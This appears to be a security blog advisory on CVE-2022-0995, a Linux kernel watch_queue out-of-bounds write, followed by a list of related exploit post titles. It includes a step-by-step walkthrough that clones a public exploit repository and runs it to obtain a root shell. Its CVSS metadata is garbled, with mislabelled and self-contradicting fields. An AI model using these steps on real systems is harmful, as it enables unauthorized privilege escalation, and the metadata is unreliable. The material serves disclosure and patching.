An out-of-bounds (OOB) memory write flaw was found in the Linux kernel’s watch_queue event notification subsystem. This flaw can overwrite parts of the kernel state, potentially allowing a local user to gain privileged access or cause a denial of service on the system.
Vulnerability Release Time:
2022-03-14 11:43 UTC
Vulnerability Impact & Type
Successful exploitation of this vulnerability could lead to disclosure of sensitive information, addition or modification of data, or Denial of Service (DoS).
Privilege Escalation
Affected Products:
This vulnerability exist in all Linux versions up to 5.17 RC1 till RC7
Fixed Versions
Kernel 5.17 RC8 and above
Severity:
The software writes data past the end, or before the beginning, of the intended buffer. This typically occurs when the pointer or its index is incremented or decremented to a position beyond the bounds of the buffer or when pointer arithmetic results in a position outside of the valid memory location to name a few. This may result in corruption of sensitive information, a crash, or code execution among other things.
CVSS v3.1:
Base Score: 7.2 (High)
CWD ID: 787
Vulnerability type: Low
Gained Access: None
Authentication: None
Confidentiality Impact: Complete
Integrity Impact: Complete
Availability Impact: Complete
Access Complexity: Low
Mitigation:
Mitigation for this issue is either not available or the currently available options don't meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base, or stability
Technical Analysis / Exploits:
1. Login to my linux machine as a normal user and shown the linux version I’m using.
2. Now let’s download exploit data in our local machine. Use below command to successfully download exploit data from github repository:
git clone https://github.com/Bonfee/CVE-2022-0995.git
3. After cloning the repository, change current directory to downloaded
repository directory using below command:
cd CVE-2022-0995
After the script completes its execution, you will successfully get the root user shell.
./exploit
4. After the script completes its execution, you will successfully get the root user shell.
5. Now, use below command to get bash shell of root user:
/bin/bash/
Now you are at root user bash shell and you can do everything as a root user.
Reference:
● https://github.com/Bonfee/CVE-2022-0995
● https://nvd.nist.gov/vuln/detail/CVE-2022-0995
● https://access.redhat.com/security/cve/cve-2022-0995
#CVE–2022-0995 #Linux #kernel #Out-of-Bound(OOB)
An out-of-bounds (OOB) memory write flaw was found in the Linux kernel’s
Microsoft Windows Contacts (VCF/Contact/LDAP) syslink control href attribute escape vulnerability (CVE-2022-44666) (0day)
j00sean (https://twitter.com/j00sean) July 11, 2023CVE-2021-38294: Apache Storm Nimbus Command Injection
Zeyad Abdelazim June 20, 2023CVE-2023-21931 & CVE-2023-21839 RCE via post-deserialization
Mohammad Hussam Alzeyyat June 19, 2023Have you missed them? The new reports feature is here!
Noa Machter May 14, 2023CVE-2021-45456 Apache Kylin RCE Exploit
Mohammad Hussam Alzeyyat April 30, 2023